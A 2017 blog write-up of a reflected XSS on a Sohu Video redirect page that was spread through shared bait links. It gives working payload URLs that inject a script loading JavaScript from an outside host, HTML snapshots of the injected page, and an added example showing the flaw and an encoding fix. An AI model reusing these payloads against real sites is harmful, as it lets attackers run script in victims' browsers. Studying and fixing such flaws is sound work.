Sohu Video redirect page: running into XSS  Date: 2017.12.23


This post has no technical depth; it only shows what the vulnerability looks like in practice.

This was also the first time Xiao Wei had run into one; he just casually executed a single line of JS.

  • How it started

It spread by baiting people into sharing the link.

  • Curious, I took a look at the "video"

Link:

Hangzhou police chief, in plain clothes, takes his daughter out for dinner and is humiliated and handcuffed by auxiliary police; the mayor apologizes in person! (original bait headline, with backticks inserted between characters: 杭州公`安`局`长穿便衣带女儿吃饭,被辅`警`羞`辱带手`铐,`市`长`亲自道歉!):

http://XXX/redirect.?albumName=%27%3Bvar%20s%20%3D%20document.createElement%28%27script%27%29%3Bs.src%20%3D%20%27%2f%2ft.cn%2fRTgDQUL%27%3Bdocument.body.appendChild%28s%29%3B%3C%2fscript%3E%27&from=groupmessage&isappinstalled=0#pt_1514010136989
  • Inspect element

  • Quick experiment: load my own JS script

Xiao Wei prepared his own JS, hearts and an alert popup: https://waylee.net/f.js

Just replace the characters after %2f%2f in the URL (the host of the script src), press Enter to load the page, and you will see the JS is embedded normally:
  • Result: the script loads and executes:

This is a reflected XSS, small as it is. The page's inline script writes the albumName parameter straight into a JavaScript string literal (`var programe = '<albumName>';`), so the leading `'` of the payload closes the literal, the `var s = ...` that follows runs as code, and the trailing `</script>` in the payload ends the script block early: the remainder of the page's inline code (the leftover `'';`, the countdown, the redirect) is no longer parsed as script, so the attacker's code is not broken by a syntax error. The snapshots below show exactly that line.
My skills are limited: I could not get at the attacker's actual page flow (whatever the t.cn short link served), nor take it any further; if you're interested, have a look for yourself.
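As an added worked example (not code from the original post or from Sohu), the script below models the injection point visible in the snapshots, `var programe = '<albumName>';` inside an inline `<script>`, as a small server-side template. It decodes the `albumName` parameter from the demo URL quoted in this post, renders it both with the vulnerable concatenation and with a hardened JS-literal encoder, and executes each resulting inline script against a fake `document` to show that only the vulnerable rendering appends the external script. The template helpers, the fake `document` and all function names are illustrative assumptions; the URL and payload are the ones from the post.

```javascript
// Added example, not code from the original post or from Sohu. Models the
// injection point seen in the snapshot (`var programe = '<albumName>';` in an
// inline <script>) as a tiny template, and contrasts it with a hardened one.
// The fake `document` and the helper names are illustrative assumptions.

// The demo URL quoted in the post (copied verbatim).
const DEMO_URL =
  "http://so.tv.sohu.com/redirect.?albumName=%27%3Bvar%20s%20%3D%20document." +
  "createElement%28%27script%27%29%3Bs.src%20%3D%20%27%2f%2fwaylee.net%2ff.js" +
  "%27%3Bdocument.body.appendChild%28s%29%3B<%2fscript>%27&from=groupmessage" +
  "&isappinstalled=0#";

// What the server receives for albumName after URL decoding.
function extractAlbumName(url) {
  return new URL(url).searchParams.get("albumName");
}

// Vulnerable rendering: raw concatenation into a JS string literal, as in the
// snapshot. The leading ' of the payload closes the literal, the code after it
// runs, and the payload's </script> ends the block early.
function renderVulnerable(albumName) {
  return "<script>var programe = '" + albumName + "';</script>";
}

// Hardened rendering: emit a real JS string literal. JSON.stringify handles
// quotes, backslashes and control characters; "<" and ">" are escaped as well
// so "</script>" can never reach the HTML tokenizer, and the JS line
// terminators U+2028/U+2029 are escaped for older engines.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

function renderSafe(albumName) {
  return "<script>var programe = " + jsStringLiteral(albumName) + ";</script>";
}

// Static check: how many script end tags would the HTML tokenizer see?
// One is the template's own; any more means the parameter broke out.
function closingScriptTags(html) {
  return (html.match(/<\/script[\s\/>]/gi) || []).length;
}

// Minimal stand-in for the browser DOM so the inline script can be run
// offline; it records everything appended to document.body.
function fakeDocument() {
  const appended = [];
  return {
    appended,
    createElement(tag) { return { tagName: tag.toUpperCase(), src: "" }; },
    body: { appendChild(el) { appended.push(el); return el; } },
  };
}

// Execute the first inline script the way a browser would: script data ends
// at the first "</script" (the tokenizer knows nothing about JS strings).
// Returns the value `programe` ended up with.
function runInlineScript(html, document) {
  const m = /<script>([\s\S]*?)<\/script/i.exec(html);
  if (!m) throw new Error("no inline script found");
  return new Function("document", m[1] + "\nreturn programe;")(document);
}

function demo() {
  const payload = extractAlbumName(DEMO_URL);
  const vulnDoc = fakeDocument();
  const safeDoc = fakeDocument();
  const vulnValue = runInlineScript(renderVulnerable(payload), vulnDoc);
  const safeValue = runInlineScript(renderSafe(payload), safeDoc);
  return {
    payload,
    vulnerable: { programe: vulnValue, loaded: vulnDoc.appended.map((e) => e.src) },
    safe: { programe: safeValue, loaded: safeDoc.appended.map((e) => e.src) },
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

Running it with `node` prints the decoded payload and, for each rendering, the value `programe` ended up with and the script URLs appended to the body: the vulnerable template leaves `programe` empty and loads `//waylee.net/f.js`, the hardened one stores the whole payload as inert text and loads nothing. The encoder is the general fix: any value placed inside a `<script>` block must be serialized as a JavaScript literal with `<`, `>` and the line terminators escaped, because the HTML tokenizer ends script data at the first `</script` regardless of JavaScript quoting.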
  • Afterword:

With enough skill you can do anything from here; I will just give a simple demo of a popup and a redirect:

Vulnerability demo:

http://so.tv.sohu.com/redirect.?albumName=%27%3Bvar%20s%20%3D%20document.createElement%28%27script%27%29%3Bs.src%20%3D%20%27%2f%2fwaylee.net%2ff.js%27%3Bdocument.body.appendChild%28s%29%3B<%2fscript>%27&from=groupmessage&isappinstalled=0#

 

HTML snapshot (response as served, with the payload reflected into the inline script):






<!doctype html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>搜狐视频-视频搜索</title>
	<style>
	    div,p,span{margin:0;padding:0}
        img{border:none}
	    body{background:#fcfcfc;}
	    .changeBox{margin:60px auto 0;width:980px;font:12px/1.5 hiragino sans gb,microsoft yahei,simsun;color:#3a3a3a}
	    .changeBox a{text-decoration:none;color:#3a3a3a}
	    .changeBox a:hover{color:#e73c31;text-decoration:underline;}
		.tv-logo{border-bottom:1px dotted #d9d9d9;height:70px;text-align:center;}
		.infoBox{padding-top:42px;text-align:center;}
		.infoBox p{padding-bottom:25px;font-size:16px;}
		.infoBox .tips{font-size:14px;}
		.changeBox .btn-red{display:inline-block;padding:0 20px;margin-right:18px;background:#e73c31;height:42px;line-height:42px;color:#fff;}
		.changeBox .btn-red:hover{background:#e55359;color:#fff;text-decoration:none;}
		.setTime{display:inline-block;color:#e73c31;font-size:20px;margin:-1px 3px 0 0;vertical-align:middle;}
		.ico-yin{display:inline-block;margin-left:27px;padding-left:23px;color:#e73c31;background:url(//tv.sohu.com/upload/static/special/search-zz/ico_yy.png) no-repeat left center;}
		.changeBox .ico-yin{color:#e73c31}
	</style>
    
<script type="text/javascript" src="//js.tv.itc.cn/kao.js"></script>
<script type="text/javascript" src="//js.tv.itc.cn/dict.js"></script>
<script type="text/javascript">
	//sohuHD.pingback('http://click.hd.sohu.com.cn/s.gif?type=search_list_show&expand5=' + cat + '&_=' + new Date().getTime());
	kao('pingback', function () {
		pingbackBundle.initHref({
			customParam : {
				meta : {
					url : '//click.hd.sohu.com.cn/x.gif',
					type : ['extends'],
					stype : ['redirect'],
					col1 : function(config, el) {
						return el.getAttribute('_s_c')== null ? ['0'] : el.getAttribute('_s_c');
					},
					suv : 'cookie-SUV',
					p : 'passport',
					y : 'cookie-YYID',
					f : 'cookie-fuid',
					_ : 'stamp'
				}
			}
		});
	});
	</script>
</head>
<body>
	<div class="changeBox">
		<div class="tv-logo">
			<a href="//tv.sohu.com/" target="_blank"><img src="//tv.sohu.com/upload/static/special/search-zz/logo_tv.png" width="119" height="50" alt=""></a>
		</div>
		<div class="infoBox">
			<p>
				小狐即将带您去“<span id="siteA"></span>”观看《<span id="proName"></span>》,您还可以留在搜狐观看其他节目。
			</p>
			<p id="tip-panel"><span class="setTime" id="time">6</span>秒后,自动跳转到<span id="siteB"></span>~</p>
			<p class="btnBox">
				<a href="#" class="btn-red" id="view" _s_c="click"  pb-url="meta">立即去观看</a>
				<a href="#" onclick="goReturn();return false;" class="btn-red" _s_c="stay" pb-url="meta">返回首页</a>
			</p>
			<p class="tips">
				温馨提示:安装搜狐影音,就可以一站式观看全网视频哦~  
				<a href="//tv.sohu.com/app/" id="ifox-dl-btn" class="ico-yin" _s_c="download"  pb-url="meta">下载搜狐影音</a>
			</p>
		</div>
	</div>	
	<script language="JavaScript" type="text/javascript">
	    function $(id){
			return document.getElementById(id);
		};
		
		function delayURL(url) {
			var time = 5, el = $("time"), timer;
			el.innerHTML = time;
			function tick() {
				time--;
				if (time > 0) {
					el.innerHTML = time;
					timer = setTimeout(tick, 1e3)
				} else {
					window.top.location.href = url;
				}
			}
			timer = setTimeout(tick, 1e3);
			var btn = document.getElementById('ifox-dl-btn');
			var tipPanel = document.getElementById('tip-panel');
			btn.onclick = function() {
				clearTimeout(timer)
				tipPanel.style.display = 'none';
			}
		};
		function goReturn() {
			window.opener = null;
			window.open('//tv.sohu.com', '_self');
			//window.close();
		};
		var iurl = "";
		var site = '';
		var programe = '';var s = document.createElement('script');s.src = '//waylee.net/f.js';document.body.appendChild(s);</script>'';
		$("view").href = iurl;
		$('siteA').innerHTML = site;
		$('siteB').innerHTML = site;
		$('proName').innerHTML = programe;
		delayURL(iurl);
	</script>
</body>
<script>
    (function(G, D, s, c, p) {
        c = {
            UA: "UA-sohu-123456", 
            NO_FLS: 1,
            WITH_REF: 1,
            API_URL: "//sohu.irs01.com/irt?",
            URL: '//tv.sohu.com/upload/Trace/iwt-min-1611.js'
        };
        G._iwt ? G._iwt.track(c, p) : (G._iwtTQ = G._iwtTQ || []).push([c, p]), !G._iwtLoading && lo();

        function lo(t) {
            G._iwtLoading = 1;
            s = D.createElement("script");
            s.src = c.URL;
            t = D.getElementsByTagName("script");
            t = t[t.length - 1];
            t.parentNode.insertBefore(s, t);
        }
    })(this, document); 
</script>
<script type="text/javascript" src="//js.tv.itc.cn/hdpv.js"></script>
<script>
  var _comscore = _comscore || [];
  _comscore.push({ c1: "2", c2: "7395122" });
  (function() {
    var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
    s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
    el.parentNode.insertBefore(s, el);
  })();
</script>
<noscript>
  <img src="//b.scorecardresearch.com/p?c1=2&c2=7395122&cv=2.0&cj=1" />
</noscript>
<!-- End comScore Tag -->

<script type="text/javascript" language="javascript" src="//a1.itc.cn/pv/js/spv.1305141919.js"></script>
</html>

 

Snapshot (rendered DOM, after the injected script ran):

<!doctype html>
<html lang="en"><head><script type="text/javascript" src="https://sohu.irs01.com/irt?_iwt_UA=UA-sohu-123456&jsonp=_159P5"></script>
	<meta charset="UTF-8">
	<title>搜狐视频-视频搜索</title>
	<style>
	    div,p,span{margin:0;padding:0}
        img{border:none}
	    body{background:#fcfcfc;}
	    .changeBox{margin:60px auto 0;width:980px;font:12px/1.5 hiragino sans gb,microsoft yahei,simsun;color:#3a3a3a}
	    .changeBox a{text-decoration:none;color:#3a3a3a}
	    .changeBox a:hover{color:#e73c31;text-decoration:underline;}
		.tv-logo{border-bottom:1px dotted #d9d9d9;height:70px;text-align:center;}
		.infoBox{padding-top:42px;text-align:center;}
		.infoBox p{padding-bottom:25px;font-size:16px;}
		.infoBox .tips{font-size:14px;}
		.changeBox .btn-red{display:inline-block;padding:0 20px;margin-right:18px;background:#e73c31;height:42px;line-height:42px;color:#fff;}
		.changeBox .btn-red:hover{background:#e55359;color:#fff;text-decoration:none;}
		.setTime{display:inline-block;color:#e73c31;font-size:20px;margin:-1px 3px 0 0;vertical-align:middle;}
		.ico-yin{display:inline-block;margin-left:27px;padding-left:23px;color:#e73c31;background:url(//tv.sohu.com/upload/static/special/search-zz/ico_yy.png) no-repeat left center;}
		.changeBox .ico-yin{color:#e73c31}
	</style>
    
<script async="" src="https://b.scorecardresearch.com/beacon.js"></script><script type="text/javascript" src="//js.tv.itc.cn/kao.js"></script>
<script type="text/javascript" src="//js.tv.itc.cn/dict.js"></script>
<script type="text/javascript">
	//sohuHD.pingback('http://click.hd.sohu.com.cn/s.gif?type=search_list_show&expand5=' + cat + '&_=' + new Date().getTime());
	kao('pingback', function () {
		pingbackBundle.initHref({
			customParam : {
				meta : {
					url : '//click.hd.sohu.com.cn/x.gif',
					type : ['extends'],
					stype : ['redirect'],
					col1 : function(config, el) {
						return el.getAttribute('_s_c')== null ? ['0'] : el.getAttribute('_s_c');
					},
					suv : 'cookie-SUV',
					p : 'passport',
					y : 'cookie-YYID',
					f : 'cookie-fuid',
					_ : 'stamp'
				}
			}
		});
	});
	</script>
<script src="//pv.sohu.com/pv.gif?t?=1514019803719781_1366_768?r?="></script><style type="text/css">.heart{width: 10px;height: 10px;position: fixed;background: #f00;transform: rotate(45deg);-webkit-transform: rotate(45deg);-moz-transform: rotate(45deg);}.heart:after,.heart:before{content: '';width: inherit;height: inherit;background: inherit;border-radius: 50%;-webkit-border-radius: 50%;-moz-border-radius: 50%;position: absolute;}.heart:after{top: -5px;}.heart:before{left: -5px;}</style></head>
<body class=" sohuIEHINT"><div style="display:block;clear:both;float:none;position:absolute;right:0;bottom:0;border:none;"><object name="TTJBJ4AT6Q4AHK9U" id="TTJBJ4AT6Q4AHK9U" data="//tv.sohu.com/upload/swf/playerGetUID131031.swf" type="application/x-shockwave-flash" width="1" height="1" style="position:absolute;right:0;bottom:0;border:none;"><param name="movie" value="//tv.sohu.com/upload/swf/playerGetUID131031.swf"><param name="wmode" value="transparent"><param name="version" value="10"><param name="allowScriptAccess" value="always"><param name="flashvars"></object></div>
	<div class="changeBox">
		<div class="tv-logo">
			<a href="//tv.sohu.com/" target="_blank"><img src="//tv.sohu.com/upload/static/special/search-zz/logo_tv.png" width="119" height="50" alt=""></a>
		</div>
		<div class="infoBox">
			<p>
				小狐即将带您去“<span id="siteA"></span>”观看《<span id="proName"></span>》,您还可以留在搜狐观看其他节目。
			</p>
			<p id="tip-panel"><span class="setTime" id="time">6</span>秒后,自动跳转到<span id="siteB"></span>~</p>
			<p class="btnBox">
				<a href="#" class="btn-red" id="view" _s_c="click" pb-url="meta">立即去观看</a>
				<a href="#" onclick="goReturn();return false;" class="btn-red" _s_c="stay" pb-url="meta">返回首页</a>
			</p>
			<p class="tips">
				温馨提示:安装搜狐影音,就可以一站式观看全网视频哦~  
				<a href="//tv.sohu.com/app/" id="ifox-dl-btn" class="ico-yin" _s_c="download" pb-url="meta">下载搜狐影音</a>
			</p>
		</div>
	</div>	
	<script language="JavaScript" type="text/javascript">
	    function $(id){
			return document.getElementById(id);
		};
		
		function delayURL(url) {
			var time = 5, el = $("time"), timer;
			el.innerHTML = time;
			function tick() {
				time--;
				if (time > 0) {
					el.innerHTML = time;
					timer = setTimeout(tick, 1e3)
				} else {
					window.top.location.href = url;
				}
			}
			timer = setTimeout(tick, 1e3);
			var btn = document.getElementById('ifox-dl-btn');
			var tipPanel = document.getElementById('tip-panel');
			btn.onclick = function() {
				clearTimeout(timer)
				tipPanel.style.display = 'none';
			}
		};
		function goReturn() {
			window.opener = null;
			window.open('//tv.sohu.com', '_self');
			//window.close();
		};
		var iurl = "";
		var site = '';
		var programe = '';var s = document.createElement('script');s.src = '//waylee.net/f.js';document.body.appendChild(s);</script><script src="//waylee.net/f.js"></script>'';
		$("view").href = iurl;
		$('siteA').innerHTML = site;
		$('siteB').innerHTML = site;
		$('proName').innerHTML = programe;
		delayURL(iurl);
	

<script src="//tv.sohu.com/upload/Trace/iwt-min-1611.js"></script><script>
    (function(G, D, s, c, p) {
        c = {
            UA: "UA-sohu-123456", 
            NO_FLS: 1,
            WITH_REF: 1,
            API_URL: "//sohu.irs01.com/irt?",
            URL: '//tv.sohu.com/upload/Trace/iwt-min-1611.js'
        };
        G._iwt ? G._iwt.track(c, p) : (G._iwtTQ = G._iwtTQ || []).push([c, p]), !G._iwtLoading && lo();

        function lo(t) {
            G._iwtLoading = 1;
            s = D.createElement("script");
            s.src = c.URL;
            t = D.getElementsByTagName("script");
            t = t[t.length - 1];
            t.parentNode.insertBefore(s, t);
        }
    })(this, document); 
</script>
<script type="text/javascript" src="//js.tv.itc.cn/hdpv.js"></script>
<script>
  var _comscore = _comscore || [];
  _comscore.push({ c1: "2", c2: "7395122" });
  (function() {
    var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
    s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
    el.parentNode.insertBefore(s, el);
  })();
</script>
<noscript>
  <img src="//b.scorecardresearch.com/p?c1=2&c2=7395122&cv=2.0&cj=1" />
</noscript>
<!-- End comScore Tag -->

<script type="text/javascript" language="javascript" src="//a1.itc.cn/pv/js/spv.1305141919.js"></script>
</body></html>

 
